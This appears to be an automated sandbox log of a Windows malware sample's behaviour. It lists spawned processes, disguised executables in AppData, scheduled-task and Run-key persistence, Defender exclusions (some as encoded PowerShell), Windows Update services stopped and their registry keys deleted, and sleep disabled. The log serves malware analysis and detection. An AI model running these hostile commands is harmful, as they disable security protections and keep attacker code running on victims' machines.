Source: C:\Users\user\Desktop\N2wufLmC74.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe "C:\Users\user\AppData\Local\Microsoft\conchsvt.exe"
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\user\AppData\Local\Microsoft\conchsvt.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Users\user\AppData\Local\Google\brave.exe "C:\Users\user\AppData\Local\Google\brave.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\user\AppData\Local\Microsoft\conchsvt.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
Source: unknown	Process created: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe C:\Users\user\AppData\Local\Microsoft\conchsvt.exe
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\user\AppData\Local\Microsoft\conchsvt.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Users\user\AppData\Local\Google\ofg.exe "C:\Users\user\AppData\Local\Google\ofg.exe"
Source: C:\Users\user\AppData\Local\Google\ofg.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\ofg.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Users\user\AppData\Local\Google\chrome.exe "C:\Users\user\AppData\Local\Google\chrome.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Google\ofg.exe C:\Users\user\AppData\Local\Google\ofg.exe
Source: C:\Users\user\AppData\Local\Google\ofg.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\ofg.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\user\AppData\Local\Microsoft\conchsvt.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\cmd.exe cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -enC QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAnAEMAOgBcAFUAcwBlAHIAcwBcAFIAZQB2AGUAbABpAG4AJwAsACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACcAKQAgAC0ARgBvAHIAYwBlAA==
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\cmd.exe cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -enC UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AUwB1AGIAbQBpAHQAUwBhAG0AcABsAGUAcwBDAG8AbgBzAGUAbgB0ACAAMgA=
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Users\user\AppData\Local\Temp\zonewar.exe "C:\Users\user\AppData\Local\Temp\zonewar.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\chrome.exe" /TN "GoogleUpdateTask{56c41dbe-92cb-4ab7-b423-bd40cb65f9fe}" /SC ONLOGON /F /RL HIGHEST
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\chrome.exe" /TN "GoogleUpdateTaskUAC{0625ad4f-50a5-4d12-b200-288d853de0d5}" /SC HOURLY /F /MO 1 /RL HIGHEST
Source: C:\Users\user\AppData\Local\Temp\zonewar.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\GoogleUpdate.exe C:\Windows\GoogleUpdate.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Google\chrome.exe C:\Users\user\AppData\Local\Google\chrome.exe
Source: C:\Users\user\AppData\Local\Temp\zonewar.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\GoogleUpdate.exe C:\Windows\GoogleUpdate.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe "C:\Users\user\AppData\Local\Microsoft\conchsvt.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Users\user\AppData\Local\Google\brave.exe "C:\Users\user\AppData\Local\Google\brave.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Users\user\AppData\Local\Google\ofg.exe "C:\Users\user\AppData\Local\Google\ofg.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Users\user\AppData\Local\Google\chrome.exe "C:\Users\user\AppData\Local\Google\chrome.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Users\user\AppData\Local\Temp\zonewar.exe "C:\Users\user\AppData\Local\Temp\zonewar.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\user\AppData\Local\Microsoft\conchsvt.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\user\AppData\Local\Microsoft\conchsvt.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\cmd.exe cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\user\AppData\Local\Microsoft\conchsvt.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\user\AppData\Local\Microsoft\conchsvt.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\ofg.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\ofg.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -enC QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAnAEMAOgBcAFUAcwBlAHIAcwBcAFIAZQB2AGUAbABpAG4AJwAsACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACcAKQAgAC0ARgBvAHIAYwBlAA==	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -enC UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AUwB1AGIAbQBpAHQAUwBhAG0AcABsAGUAcwBDAG8AbgBzAGUAbgB0ACAAMgA=	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\chrome.exe" /TN "GoogleUpdateTask{56c41dbe-92cb-4ab7-b423-bd40cb65f9fe}" /SC ONLOGON /F /RL HIGHEST	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\chrome.exe" /TN "GoogleUpdateTaskUAC{0625ad4f-50a5-4d12-b200-288d853de0d5}" /SC HOURLY /F /MO 1 /RL HIGHEST	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\GoogleUpdate.exe C:\Windows\GoogleUpdate.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\GoogleUpdate.exe C:\Windows\GoogleUpdate.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\ofg.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\ofg.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Users\user\AppData\Local\Temp\zonewar.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: unknown unknown

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
